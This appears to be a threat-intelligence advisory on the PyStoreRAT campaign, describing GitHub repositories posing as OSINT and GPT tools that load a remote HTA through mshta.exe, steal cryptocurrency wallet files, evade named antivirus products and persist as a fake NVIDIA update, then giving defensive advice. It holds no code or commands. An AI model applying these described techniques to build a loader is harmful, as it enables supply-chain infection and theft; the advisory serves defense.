The PyStoreRAT campaign represents a sophisticated malware distribution operation leveraging GitHub-hosted Python repositories that masquerade as legitimate OSINT tools, GPT wrappers, and development utilities. These repositories contain minimal code that silently downloads a remote HTML Application (HTA) file and executes it using the Windows mshta.exe utility, a known vector for executing malicious scripts. PyStoreRAT is a modular, multi-stage Remote Access Trojan capable of executing a wide range of payload formats including EXE, DLL, PowerShell scripts, MSI packages, Python scripts, and JavaScript code. The malware’s capabilities include system profiling, privilege checking, and targeted theft of cryptocurrency wallet files from popular wallet applications such as Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02. To evade detection, the loader stub scans for installed antivirus products, specifically looking for strings related to CrowdStrike Falcon and Cybereason, and adjusts its execution method accordingly to reduce visibility. Persistence is maintained by creating a scheduled task disguised as an NVIDIA app self-update. The malware communicates with external command-and-control servers to receive instructions, which include downloading and executing additional payloads, running PowerShell commands in memory, spreading via removable drives by replacing legitimate documents with malicious shortcuts, and deleting forensic artifacts. The campaign abuses GitHub’s trust by artificially inflating repository popularity metrics and using dormant or newly created accounts to publish malicious code, making detection challenging. The presence of Russian-language artifacts suggests an Eastern European threat actor. This campaign highlights a shift towards modular, script-based implants that adapt to security controls and evade traditional endpoint detection and response (EDR) solutions until late in the infection chain.

For European organizations, the PyStoreRAT campaign poses significant risks, particularly to software developers, cybersecurity researchers, and cryptocurrency holders who frequently use GitHub-hosted tools. The malware’s ability to steal sensitive cryptocurrency wallet data threatens financial assets and could lead to direct monetary losses. Its modular nature and capability to execute diverse payloads increase the risk of system compromise, data exfiltration, and lateral movement within networks. The stealthy evasion techniques reduce the likelihood of early detection, potentially allowing attackers prolonged access to sensitive environments. Organizations involved in DeFi, blockchain development, or those maintaining cryptocurrency infrastructure are especially vulnerable. Additionally, the abuse of trusted platforms like GitHub undermines supply chain security, increasing the risk of widespread infection through legitimate development workflows. The persistence mechanism and ability to delete forensic traces complicate incident response and recovery efforts. Overall, this threat could lead to confidentiality breaches, integrity violations, and operational disruptions across affected European enterprises.

European organizations should implement a multi-layered defense strategy beyond generic advice. First, enforce strict vetting and validation of third-party code repositories, especially those sourced from GitHub, by integrating automated code analysis and reputation scoring tools that detect minimal or suspicious code patterns indicative of loader stubs. Employ behavioral detection systems that monitor for anomalous mshta.exe executions, particularly those initiated via cmd.exe or involving remote HTA files. Enhance endpoint detection and response capabilities to identify script-based modular implants and unusual scheduled tasks, such as those masquerading as NVIDIA updates. Implement network monitoring and egress filtering to detect and block communications with known or suspicious command-and-control servers. Educate developers and analysts on the risks of blindly trusting popular GitHub repositories, emphasizing verification of repository authenticity and recent activity patterns. Use application whitelisting to restrict execution of unauthorized scripts and binaries. Regularly audit scheduled tasks and persistence mechanisms for anomalies. Finally, collaborate with GitHub and security communities to report and remove malicious repositories promptly, and consider deploying deception technologies to detect lateral spread via removable drives.